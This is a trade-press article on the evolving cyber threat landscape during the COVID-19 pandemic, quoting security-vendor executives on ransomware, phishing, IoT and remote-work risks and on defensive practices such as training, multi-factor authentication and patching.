Companies in every industry and of all sizes are finding themselves under an increasing barrage of cyberattacks. At the same time, the threat landscape is evolving, becoming more sophisticated and doing so at a faster pace than many organisations are able to keep up with.
The days are gone where a firewall alone was sufficient protection against a cybercriminal or group. The proliferation of connected devices, alongside flexible working practices and complex partner ecosystems have made the boundaries of an organisation ebb and flow. Threat actors with malicious intent are taking advantage of at an eye-wateringly large cost to businesses.
There are a number of threats which are evolving more quickly than others, but what are the ones that businesses need to be especially aware of today?
Attacks Are Getting Tactical and Targeted
While COVID-19 continues to drive cybersecurity trends as a whole, it has also inspired new attacks capitalising on our desire for news, assistance or guidelines that could help keep us safe. While global malware dips, new and measured attacks, including ransomware, pivot the cyber war in the first half of 2020. Amid the disruption, a few key takeaways emerge: Malware is down, but changing and spreading. It’s worth noting, however, that less malware doesn’t necessarily mean a safer world.
Mohamed Abdallah, the Regional Director for Middle East, Turkey and Africa at SonicWall, explains, “Across all categories of malware, SonicWall researchers have noted that attacks are both more tactical and more targeted than ever, giving them a greater chance of success. The malware that we are seeing is evolving to be sneakier and more malicious. As detection tools are refined, hackers are increasingly turning to fileless malware attacks that operate in memory and take advantage of legitimate tools such as Microsoft Windows Powershell.”
According to Abdallah, ransomware is up, particularly in the U.S. (+109%). “Office files continue to be leveraged for malicious agenda. SonicWall Capture Advanced Threat Protection (ATP) with Real-Time Deep Memory Inspection is catching more attacks than ever. Malware targeting Internet of Things (IoT) devices has risen to 20.2 million, up 50% from this time last year. Cybercriminals are increasingly targeting the massive influx of employees working from home. And intrusion attempts are up 19%, to 2.3 trillion.”
Mobile phones are also becoming a focal point for nation states and rogue hacking groups. Traditionally, attackers have been targeting mobile phones for taking data, performing surveillance on the users, and its location services. “We’ve seen the transition by attackers to using the mobile phone as the penetration vector into the organizational network. That being said, there hasn’t been an influx of new techniques introduced into the industry for penetration — we primarily see phishing emails at the top of most threat actors’ lists,” says Israel Barak, the Chief Information Security Officer at Cybereason.
Cyber crime actors continue to prey on victims using COVID-19 themed attacks. “Recently, we’ve seen attackers use fake apps that claim to offer continuous monitoring of the infection rates in a city or country. Or in one instance, a scam was being run with employees at one company receiving text messages appearing to come from the company’s administrators with an update on what the company is doing in response to the pandemic. Employees will click on the links contained in the text messages leading them to fraudulent websites,” adds Barak.
According to Derek Manky, the Chief of Security Insights and Global Threat Alliances, at Fortinet, the potential attack surface of organizations continues to expand, and the speed and sophistication of cyberattacks continue to make defending the network ever more challenging. “With IT teams on constant alert, and much of their time spent putting out fires, it can be difficult for organizations to pause and look at the big picture. Most breaches today are driven by cybercriminals who steal sensitive information to sell on the Dark Web, or encrypt systems and ask for a ransom,” he says.
Manky further adds that as a result, hacking has become much more sophisticated and lethal. For example, more than half of all attacks are managed by cybercrime organizations that are better organized than most companies. “They approach their work like any business, except that their revenue streams are stolen data and extortion. Their new Cybercrime-as-a-Service ecosystem is one of the biggest reasons why the cybercrime industry grows dramatically and generates more than one trillion dollars in revenue every year,” he says.
Last year, various states in the Middle East including UAE, Saudi Arabia, Oman, Jordan, and Turkey attracted a large number of inbound attacks. “Cyberattack patterns remain more or less the same for this year, but we are seeing a surge of new attacks that are designed to exploit the uncertainty and anxiety around the COVID-19 pandemic. With the spread of pandemic, many enterprises have adopted remote working. While the security analysts are working on scaling up organization-wide security frameworks to maintain users’ trust and handle multiple remote endpoints, cloud integrity, online identity verification, data security and more, hackers are nefariously exploiting the remote work platform to launch attacks,” says Subhalakshmi Ganapathy, Product Evangelist, ManageEngine.
Starting from the key loggers, stealers, remote access trojans (RAT) to sophisticated advanced persistent threats (APTs) like Chafer APT, and living off the land tactics, attackers are employing every technique to break the defensive security of enterprises. Hackers are using newer forms of existing malware (such as Emotet) and new malware strains to beat cyber defense systems.
During the COVID-19 pandemic crisis, the global community faced and is still facing new challenges that we could never anticipate. “Lockdowns made most businesses operate remotely through the business’ network. Through that, we witnessed a heavy reliance on remote access systems which is making businesses more susceptible to malware, ransomware and phishing attacks. This has created a challenge for businesses due to the data theft, ransomware attacks, and data breaches they have faced during COVID-19,” explains Tamer Odeh, Regional Director at SentinelOne in the Middle East.
The threat landscape today has largely stabilized. With a few exceptions, the most prominent threats and their delivery methods have been consistent for the past couple of years. “It consists of nation-state attackers, highly skilled cybercrime organizations, and low-skill opportunistic groups and individuals. The nation-state attackers are the most difficult to defend against, if it’s even possible. They are extremely highly skilled, endlessly patient and enjoy limitless resources,” asserts John Shier, Senior Security Advisor, Sophos.
“We can however learn from their past tactics and tooling which ultimately end up in the hands of organized cybercrime. This group is almost exclusively financially motivated and is responsible for a majority of the threats we encounter. Many of them are highly skilled and well-funded. They are continually looking for the next edge in defeating our defenses. Both tech and humans. They operate botnets and create most of the malware in the wild. The low-skilled, opportunistic criminals contribute to the rest of the noise and distraction in the threat landscape. They rely mostly on automation and older, over-used, and detectable tools,” he continues.
Today’s digital environment is ever-changing. Different types of assets constantly enter and exit the enterprise, and some are ephemeral – lasting mere seconds or minutes. Another element adding to what is already a complex situation is security teams being tasked to secure operational technology (OT). “According to a commissioned study conducted by Forrester Consulting, on behalf of Tenable, 61% of Saudi organizations who had suffered a business-impacting cyber attack in the last 12 months said these attacks involved their operational technology (OT) systems,” says Maher Jadallah, Regional Director – Middle East, Tenable.
According to Jadallah, in tandem, the number of vulnerabilities present in hardware and software is also rising, with the severity of each increasing. The result is security teams with hundreds of vulnerabilities to sift through and, even if prioritizing by criticality, still have far more than they can possibly handle.
“Another trend that we see increasing is organizations opening up their networks and systems to third party suppliers in an effort to improve functionality and collaboration. The ramification is that, if a supplier is breached, the attacker might be able to traverse across to other connected networks and systems. This may cause direct operational and reputational harm to all persons and companies connected to the infected provider. Network segmentation and the isolation of privileged accounts can minimise damage caused by a third party supplier breach,” adds Jadallah.
Cyber Threats Moving Beyond Ransomware
Although ransomware attacks remain popular among cyber criminals, there are still lots of other attack vectors these adversaries are using to compromise enterprises and stronghold them. “What we have been seeing as a result of the current pandemic are a few things,” adds Christopher Hills, the Deputy CTO of BeyondTrust. “Enterprises that are having to embrace remote working are now faced with a flood of Helpdesk Tickets. As a result, some enterprises are relaxing policies on endpoints and giving employees more administrator rights to help relieve some of the helpdesk tickets. This, in some cases, is causing an uptick in anxiety levels.”
Hills further adds that a BYOD (Bring Your Own Device) approach for corporate resource access is another cause for concern. “More personal devices connecting to these corporate resources means more pressure on IT teams to control Anti-Virus, OS Patch Level, and other software, to ensure they are secure and without vulnerabilities that could allow cyber criminals to compromise these personal assets and use them as a conduit to gain access to the corporate resources,” he says.
Manky further adds, “One of the most lethal combinations is a sophisticated attack that targets humans when they are in a state of fear, uncertainty, and doubt. The current COVID-19 pandemic is a great example. The internet enables most people to do their own research, and sophisticated attackers are ahead of the curve. They have anticipated the generic behavior of individuals and prepared their campaigns for the events around us by stuffing the internet, and our in boxes, with disinformation, malicious files, and links to infected web pages.”
According to Manky, “Ironically, we now live in a world where human viruses and cyber viruses cross attack paths. This is extremely effective, generating a lot of money while causing a tremendous amount of physical and monetary damage. It is very likely that we will see more game-changing vulnerabilities like Spectre, Meltdown, BlueBorne, and Broadpwn. Without true visibility and control over everything in their infrastructure, organizations will miss these threats when they breach their networks.”
Haider Pasha, Senior Director and Chief Security Officer at Palo Alto Networks, Middle East and Africa (MEA), says, “Given that more of the workforce is working remotely, we anticipate an increase in attackers targeting home routers and IoT devices, especially since 98% of all IoT device traffic is unencrypted. For better precaution, consumers should ensure their physical router is not using the default password and must create a unique password for both their routers and all physical devices. Moreover, as some economies may go into recessions with unemployment numbers on the rise in some sectors, some individuals might turn to cybercrime – which typically happens in economic downturns.”
Preparing to Face Cyber Threats
Cybersecurity criminals are preying on the landscape and opportunity. They know that now more than ever, people, businesses and corporations are all having to adjust to working more “remotely.” This is opening up new avenues for attack that they might not have previously considered.
“It seems that banking institutions are the bigger targets, and while the Emotet Malware has become popular again since first emerging in 2014, we are seeing cybercriminals step up their attacks on Wire Transfers. Cyber Criminals are tactically attacking Wire Transfers and doing various things to intercept these transfers for their personal gain,” explains Hills. “The key to success is to remain proactive, not reactive. Continue maturing policies, procedures, software, and solutions. Think about compromise to your organization or enterprise from a cyber criminal’s perspective and focus on those areas first.”
Know yourself and know your enemy is the best advice. “Know yourself is understanding how your business operate on all levels, from the operational to the executive, knowing how systems interact, how people interact and building your defenses around these specific interactions between company assets. Knowing your enemy is also crucial, threat evolve almost every other day and staying on top of the latest developments will surely make you more aware and capable of fighting off these threats when they target you,” Manky adds.
Attacks are evolving. They no longer have goals that concentrate on stealing financial information or bringing the business to a standstill using resource abuse techniques. “The goals are changing and so are the motives. Previously, the hackers were predominantly financially motivated. Now, most of the attacks have political and espionage motives. They are harvesting email or user account credentials so that they can target the cybersecurity posture of the company rather than exploiting loopholes and vulnerabilities. The damage in such cases is unimaginable,” adds Ganapathy.
Despite the growing frequency of attacks and increasing board-level awareness of common threats, many organizations are still failing to implement effective cyber defence strategies. Training is often inadequate and end-user awareness, often poor. “A new approach is required. One that puts people at the heart of cyber defence – ensuring employees are not just able to spot and deter attacks but are acutely aware of their role in keeping our organizations safe,” says Emile Abou Saleh, Regional Director, Middle East and Africa at Proofpoint.
According to Odeh, AI can helps us overcome this challenge faster and handles issues that are new to us in a more informed manner. “Whether organizations are mostly working from home or starting to go back to offices, the need for AI-powered technology that helps improve cybersecurity teams is essential. In order to defend businesses that embrace digital transformation and adopt IoT, cloud and more, organizations need dynamic artificial intelligence-driven (AI) next-generation endpoint protection platforms that defend every endpoint against all types of attacks, at every stage in the threat lifecycle without the need for human intervention,” he says.
Handling Security Challenges
Businesses spend countless dollars each year trying to protect themselves from various attack vectors that cyber criminals will use to breach them. According to Hills, what is interesting is that each company will have a unique approach depending on three major factors – Risk Tolerance, Risk Acceptance and Risk Appetite. “Having these items clearly defined and documented, is a great step. These should be the foundation of your security framework. Once these are documented, you can better approach the question of, “Am I prepared for the compromise.” If you can’t answer that question with a “Yes,” then you still have work to do,” he adds.
Hills adds that as a company, BeyondTrust tries to be as transparent as possible with its customers, by both sharing its experience and market trends, which drive decisions. “As a company, we continue to improve and mature our overall security posture, processes and programs. We continue to evaluate the cyber landscape and collaborate with our partners to enhance and mature our integrations so that our overall offering can lend itself better to suit each and every customer’s unique security requirements,” he says.
Meanwhile, Abdallah says that his company has recently introduced the new Boundless Cybersecurity model, designed to help organizations navigate a hyper-distributed IT reality where everyone is remote, everyone is mobile, and everyone is less secure. “By knowing the unknown, providing real-time visibility and leveraging breakthrough economics, SonicWall enables businesses to close the cybersecurity business gap and guard against the growing ranks of opportunistic cyber attackers. By gaining a fuller understanding about where we find ourselves in 2020, we can move as safely and resolutely as possible toward the future, whatever it has in store,” he explains.
The good guys or defenders are constantly facing cyber risks and attacks from well-funded and motivated hackers. “Our advice to customers, partners and the wider industry includes three things. You need to increase employee awareness of COVID-19 related scams. We understand that employees are more susceptible today to scams. Provide more training and awareness on some of the common techniques. And notify staff on how you as an employer will contact them in time of need — they should only use agreed upon forms of communications,” says Barak.
“As employers maintain work from home policies, there continues to be a massive increase in the use of personal mobile and company owned mobile devices. We help our customers and partners build a higher fence so that the phone is better protected by scanning and detecting malicious content that is delivered to the device, via channels such as text messages, instant messages, phishing emails and the like,” says Barak. “We also need to adopt a post breach mindset and realize that sometimes attacks will be successful. We need to have the infrastructure to protect in real time, and correlate the different parts of the attack — i.e. this attack started on a mobile phone and then moved into the corporate network — and then have the ability to remove the threat from the network.”
Pasha advises his customers and partners on various tactics related to being mindful about their security practices. “For customers, we strongly advise to think before you click on any links, and one should confirm that emails are from a trusted source. We also advise to be cautious about what to share on social platforms, as it is quite easy to unlock accounts by using personal details such as hometown or birthdays if available on public domains,” he says. “It is always advised to implement security measures as early as possible, stay alert and be aware of your security and privacy settings – for example, do not use the same password across multiple accounts. Our advice to enterprises is educate your workforce by running phishing simulations and social engineering training for employees. We must also be mindful on limiting audit access and using multi-factor authentication.”
Irrespective of the means of attack – email, cloud applications, the web, social media – today’s threats target people, not infrastructure. So, while technical solutions and controls remain crucial in building a robust cyber defence, they are just one aspect of a broad and deep barrier against the latest threats. “It is therefore crucial to have in place an approach that puts people at the heart of cyber defence – ensuring employees are not just able to spot and deter attacks but are acutely aware of their role in keeping our organisations safe. This is only possible when their training goes beyond general awareness of common threats and they have a better understanding of how their behaviour can be the difference between a successful attempt and a successful attack,” explains Abou Saleh.
According to Gopan Sivasankaran, the Senior Manager, Solutioning META at Secureworks, user education is extremely important considering the entry vectors. “Also, it’s vital for organizations to adopt security solutions that take a deliberate and highly targeted approach to machine learning and other data science techniques, which is exactly what Secureworks does. By pairing incident response experience and threat research with supervised and unsupervised machine and deep learning algorithms, the Red Cloak TDR analytics software can detect unknown threats by identifying behavioural clues. The algorithms are trained on data from our entire customer base, which further increases the accuracy of the software,” says Sivasankaran.
Security awareness and training is the most important skill these days. Not just for IT teams, but across the organization. “It is important that all of us remain aware of what is going on and understand our PC environment better. At some point in time, experts may be needed to identify and isolate issues. Having a security policy is like having a life insurance. You need it, or else the risk of being a prey is far greater,” says Rohit Bhargava, Practice Head – Cloud & Security, Cloud Box Technologies.
Bhargava further adds that as Microsoft stopped supporting certain OS versions, it is important to protect information assets having a latest OS and authentic applications in PCs. “Social engineering hacks are paving their way and it is imperative to have a stronger password protection policy to ensure personal information is not accessible to attackers. We always recommend that our SMB and enterprise clients create IT policies that highlight security awareness, offer security health checks and look for local partners with local expertise to offer managed protection and service to ensure higher levels of protection,” he says.
Shier says that doing security right is difficult. “That’s why we always say there’s no ‘silver bullet‘ in security. A good start, however, is building a solid security foundation. This includes having the right people, processes and tools in place to give you a fighting chance. A robust security culture ensures everyone is ‘on duty‘ when it comes to protecting the enterprise. Clear, easy-to-follow, and conservative processes will prevent simple mistakes from harming your business. Using the very latest prevention and protection technologies will defend your organization against attackers when the first two fail. Taken together, these three are just a starting point on the never-ending road to a mature security program,” he says.
Organisations should focus on the basics first to stop the majority of threats they will face. This means complete and live visibility into the entirety of their attack surface — be they IT or OT, traditional on-prem or in the cloud — as the first step toward reducing overall cyber risk. “Security solutions must ingest threat data, such as in-the-wild exploitation of a specific vulnerability, then use that information to discern which vulnerabilities should be addressed immediately in order to seal off attack entry points,” adds Jadallah. “Once basic asset management and vulnerability management is in place, you can then monitor the environment for anything that deviates from the norm – be it network anomalies or policy violations, or changes to the actual runtime configuration of a device like a Programmable Logic Controller (PLC) in an OT installation in a factory or plant.”
While it might seem like a luxury, taking the time to stop and think about the actor behind these attacks is vital. Enterprises need to start looking at cyberattacks and other security threats from the adversary’s perspective to understand which attacks are more attractive and lucrative for the actors and to know how best to protect against them.
For the businesses that don’t understand the threat landscape is evolving, problems will persist and they will fall further behind attackers. Organisations need to act now to ensure their cybersecurity strategies, and those of the enterprises within their supply chain, are up to date and able to respond to new forms of attacks quickly. Only then can they be safe against the ever-evolving threat landscape.